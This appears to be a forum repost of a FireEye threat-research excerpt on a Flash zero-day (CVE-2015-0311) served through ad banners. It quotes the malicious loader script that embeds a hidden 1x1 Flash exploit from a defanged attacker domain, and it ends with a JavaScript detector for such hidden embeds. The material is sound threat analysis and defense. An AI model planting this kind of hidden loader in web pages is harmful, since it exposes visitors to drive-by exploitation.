Nytro
Posted January 29, 2015

A Different Exploit Angle on Adobe's Recent Zero-Day

January 27, 2015 | By Dan Caselden, Corbin Souffrant, James T. Bennett | Exploits, Threat Research

The Angler Exploit Kit (EK) recently incorporated a zero-day exploit (CVE-2015-0311) as discussed on Jan. 21 by Kafeine (http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html). On Jan. 24, FireEye encountered a variant of this exploit packaged in a completely different way. The following is a technical discussion of this sample and its contrast to that provided by the Angler EK.

Mitigation

Adobe has released a patch addressing CVE-2015-0311. Applying this security patch will prevent this and any other samples relying on CVE-2015-0311 from successfully exploiting victim machines.

New Variant HTML/JavaScript Attack Vector

The exploit is being served through advertising banners on adult websites, including one Alexa top 1000 site. The Flash exploit is loaded by plain JavaScript generated from PHP that appears to be devoid of any environmental checks or obfuscations that are typically indicative of the Angler EK:

<script type="text/javascript" src="http://neteasymarketing[.]biz/tracking.php"></script>
----
document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param name="movie" value="http://neteasymarketing[.]biz/banner/fcf5e938398090608dbdd0ac8c382207.swf" /><!--[if !IE]>--><object type="application/x-shockwave-flash" data="http://neteasymarketing[.]biz/banner/fcf5e938398090608dbdd0ac8c382207.swf" width="1" height="1"></object><!--<![endif]--></object>');

Full article: https://www.fireeye.com/blog/threat-research/2015/01/a_different_exploit.html
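The loader quoted in the post has a recognizable shape: a Flash `<object>` sized 1x1 and pulled from a host other than the page serving it. The following detection sketch is an added example, not code from the original post or the FireEye article; the function name `findHiddenFlashEmbeds` and the hosts `ads.example` and `site.example` are assumptions, and the sample input is constructed.

```javascript
// Added example: flag Flash <object> embeds that are effectively invisible
// (<= 1x1 px) and loaded from a host other than the page's own.
const FLASH_CLSID = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000';
const FLASH_MIME = 'application/x-shockwave-flash';

// Parse name="value" / name='value' pairs from a tag's attribute text.
function parseAttrs(text) {
  const attrs = {};
  for (const m of text.matchAll(/([\w:-]+)\s*=\s*(["'])(.*?)\2/g)) {
    attrs[m[1].toLowerCase()] = m[3];
  }
  return attrs;
}

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Works on raw text, so markup inside a document.write('...') string is covered too.
function findHiddenFlashEmbeds(source, pageHost) {
  const findings = [];
  const objectTag = /<object\b([^>]*)>/gi;
  let m;
  while ((m = objectTag.exec(source)) !== null) {
    const a = parseAttrs(m[1]);
    const isClsid = (a.classid || '').toLowerCase() === FLASH_CLSID;
    const isMime = (a.type || '').toLowerCase() === FLASH_MIME;
    if (!isClsid && !isMime) continue;
    let swf = a.data;
    if (!swf) {
      // classid form: the SWF URL sits in the next <param name="movie" value="...">
      const rest = source.slice(objectTag.lastIndex);
      const p = /<param\b([^>]*)>/i.exec(rest);
      const pa = p ? parseAttrs(p[1]) : {};
      if ((pa.name || '').toLowerCase() === 'movie') swf = pa.value;
    }
    const tiny = Number(a.width) <= 1 && Number(a.height) <= 1;
    const host = swf ? hostOf(swf) : null;
    const thirdParty = host !== null && host !== pageHost.toLowerCase();
    if (tiny && thirdParty) findings.push({ swf, host, width: a.width, height: a.height });
  }
  return findings;
}

// Constructed sample modelled on the structure quoted above (placeholder hosts).
const SAMPLE = `document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param name="movie" value="http://ads.example/banner/a.swf" /><!--[if !IE]>--><object type="application/x-shockwave-flash" data="http://ads.example/banner/a.swf" width="1" height="1"></object><!--<![endif]--></object>');
<object type="application/x-shockwave-flash" data="http://site.example/player.swf" width="640" height="360"></object>`;

console.log(findHiddenFlashEmbeds(SAMPLE, 'site.example'));
```

Both the classid and MIME-type forms of the 1x1 embed are reported, while the normally sized first-party player is not; a hit is a triage signal rather than proof of exploitation.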